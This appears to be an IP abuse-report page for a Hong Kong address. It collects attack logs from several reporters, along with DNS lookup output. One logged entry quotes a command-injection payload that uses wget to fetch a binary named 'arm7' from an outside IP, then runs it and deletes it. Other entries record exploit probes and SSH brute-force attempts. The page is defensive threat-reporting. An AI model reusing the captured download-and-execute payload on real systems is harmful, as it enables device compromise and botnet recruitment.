Basic Info

City: Central

Region: Central and Western District

Country: Hong Kong

Internet Service Provider: HKBN Enterprise Solutions HK Limited

Hostname: unknown

Organization: unknown

Usage Type: Data Center/Web Hosting/Transit

Comments:
Type Details Datetime
attack
Seq 2995002506
2019-10-22 04:09:54
Comments on same subnet:
IP Type Details Datetime
218.253.242.224 attackspam
"Remote Command Execution: Unix Command Injection - Matched Data: ;chmod found within ARGS:remote_host: ;cd /tmp;wget h://142.11.199.235/arm7;chmod 777 arm7;./arm7;rm -rf arm7;#"
2020-07-08 15:11:13
218.253.242.36 attack
Automatic report - Port Scan Attack
2019-11-29 23:12:59
218.253.242.115 attack
[Sat Nov 23 12:36:17.260077 2019] [:error] [pid 26036] [client 218.253.242.115:44858] [client 218.253.242.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "127.0.0.1"] [uri "/cgi-bin/ViewLog.asp"] [unique_id "XdlR8OyVvAr7DjkOb0K9UAAAAAY"]
...
2019-11-24 03:54:49
218.253.242.215 attackspam
218.253.242.215 [11/Oct/2019:23:06:18 +0100] "POST /cgi-bin/ViewLog.asp HTTP/1.1"
218.253.242.215 [11/Oct/2019:23:06:18 +0100] "teSubmit=Save"
2019-10-12 20:30:05
218.253.242.151 attack
Ref: mx Logwatch report
2019-10-06 21:02:44
218.253.242.151 attackbotsspam
2019/10/04 19:51:45 [error] 7916#7916: *3959 open() "/srv/automx/instance/cgi-bin/ViewLog.asp" failed (2: No such file or directory), client: 218.253.242.151, server: autoconfig.tuxlinux.eu, request: "POST /cgi-bin/ViewLog.asp HTTP/1.1", host: "127.0.0.1"
2019/10/05 05:47:27 [error] 7917#7917: *4041 open() "/srv/automx/instance/cgi-bin/ViewLog.asp" failed (2: No such file or directory), client: 218.253.242.151, server: autoconfig.tuxlinux.eu, request: "POST /cgi-bin/ViewLog.asp HTTP/1.1", host: "127.0.0.1"
...
2019-10-05 17:34:54
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 218.253.242.28
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3249
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;218.253.242.28.			IN	A

;; AUTHORITY SECTION:
.			414	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019102101 1800 900 604800 86400

;; Query time: 64 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Oct 22 04:09:49 CST 2019
;; MSG SIZE  rcvd: 118
Host info:
28.242.253.218.in-addr.arpa domain name pointer static.reserve.wtt.net.hk.
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
28.242.253.218.in-addr.arpa	name = static.reserve.wtt.net.hk.

Authoritative answers can be found from:
Related IP info:
Related comments:
IP Type Details Datetime
202.80.219.149 attackspam
Attempt to attack host OS, exploiting network vulnerabilities, on 24-02-2020 04:55:21.
2020-02-24 14:58:56
36.79.185.42 attack
Attempt to attack host OS, exploiting network vulnerabilities, on 24-02-2020 04:55:24.
2020-02-24 14:52:07
222.186.15.33 attackspambots
Feb 24 03:14:56 firewall sshd[1506]: Failed password for root from 222.186.15.33 port 21197 ssh2
Feb 24 03:17:45 firewall sshd[1551]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.15.33  user=root
Feb 24 03:17:47 firewall sshd[1551]: Failed password for root from 222.186.15.33 port 64239 ssh2
...
2020-02-24 14:42:57
202.181.234.199 attack
Unauthorized connection attempt detected from IP address 202.181.234.199 to port 1433
2020-02-24 14:35:46
54.39.131.56 attack
Brute force attack against VPN service
2020-02-24 14:48:37
87.236.212.51 attack
Feb 24 07:05:27 debian-2gb-nbg1-2 kernel: \[4783529.039613\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:0e:18:f4:d2:74:7f:6e:37:e3:08:00 SRC=87.236.212.51 DST=195.201.40.59 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=10617 PROTO=TCP SPT=43666 DPT=60021 WINDOW=1024 RES=0x00 SYN URGP=0
2020-02-24 14:39:01
36.81.127.194 attack
1582520198 - 02/24/2020 05:56:38 Host: 36.81.127.194/36.81.127.194 Port: 445 TCP Blocked
2020-02-24 14:28:01
58.212.139.229 attackbotsspam
Feb 24 04:49:58 localhost sshd\[3410\]: Invalid user ftpuser from 58.212.139.229
Feb 24 04:55:43 localhost sshd\[4059\]: Invalid user feedbackalueducation@123 from 58.212.139.229
Feb 24 04:56:00 localhost sshd\[4114\]: Invalid user ftpuser from 58.212.139.229
...
2020-02-24 14:39:41
45.148.10.171 attackbotsspam
45.148.10.171 - - [24/Feb/2020:10:28:33 +0400] "POST /GponForm/diag_Form?style/ HTTP/1.1" 502 157 "-" "curl/7.3.2"
...
2020-02-24 14:47:45
220.132.141.138 attack
Automatic report - Port Scan Attack
2020-02-24 14:46:34
36.76.110.141 attackspam
Attempt to attack host OS, exploiting network vulnerabilities, on 24-02-2020 04:55:23.
2020-02-24 14:53:09
36.68.237.252 attack
SMB Server BruteForce Attack
2020-02-24 14:50:28
14.162.151.171 attack
Attempt to attack host OS, exploiting network vulnerabilities, on 24-02-2020 04:55:17.
2020-02-24 15:05:40
36.92.159.11 attackspambots
1582523059 - 02/24/2020 06:44:19 Host: 36.92.159.11/36.92.159.11 Port: 445 TCP Blocked
2020-02-24 14:51:51
185.143.223.171 attackspam
Feb 24 07:16:14 grey postfix/smtpd\[28295\]: NOQUEUE: reject: RCPT from unknown\[185.143.223.171\]: 554 5.7.1 Service unavailable\; Client host \[185.143.223.171\] blocked using truncate.gbudb.net\; http://www.gbudb.com/truncate/ \[185.143.223.171\]\; from=\<0by0egk8uqci4@evacuator-msk.ru\> to=\ proto=ESMTP helo=\<\[185.143.223.163\]\>
...
2020-02-24 14:25:58
